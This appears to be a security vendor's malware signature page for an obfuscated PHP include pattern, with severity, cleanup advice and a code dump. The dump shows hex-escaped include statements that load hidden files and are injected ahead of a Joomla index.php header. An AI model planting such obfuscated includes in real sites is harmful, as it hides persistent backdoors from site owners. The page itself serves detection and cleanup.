PRICING SUPPORT LOGIN

Included file from absolute path with obfuscated characters is a clear indicator of malware. Attackers are hiding malicious code this way thus instead of injecting full malware code into the file which could be easily spotted, they just save it in some seemingly innocent file and include just this file.

Severity

MEDIUM

Affecting

This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.

Cleanup

Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.

Dump

<?php
include "\x2fvar\x2fchr\x6fot/\x68ome\x2fcon\x74ent\x2f68/\x34788\x3868/\x68tml\x2fmod\x75les\x2fmod\x5fcus\x74om/\x73yst\x65m.p\x68p";
include "\x2fvar\x2fchr\x6fot/\x68ome\x2fcon\x74ent\x2f68/\x34788\x3868/\x68tml\x2fETR\x2f_ov\x65rla\x79/ur\x6edd/\x65rro\x72.ph\x70";
include "\x2fvar\x2fchr\x6fot/\x68ome\x2fcon\x74ent\x2f68/\x34788\x3868/\x68tml\x2flib\x72ari\x65s/t\x63pdf\x2fhel\x70.ph\x70";
/**
* @version $Id: index.php 11407 2009-01-09 17:23:42Z willebil $
* @package Joomla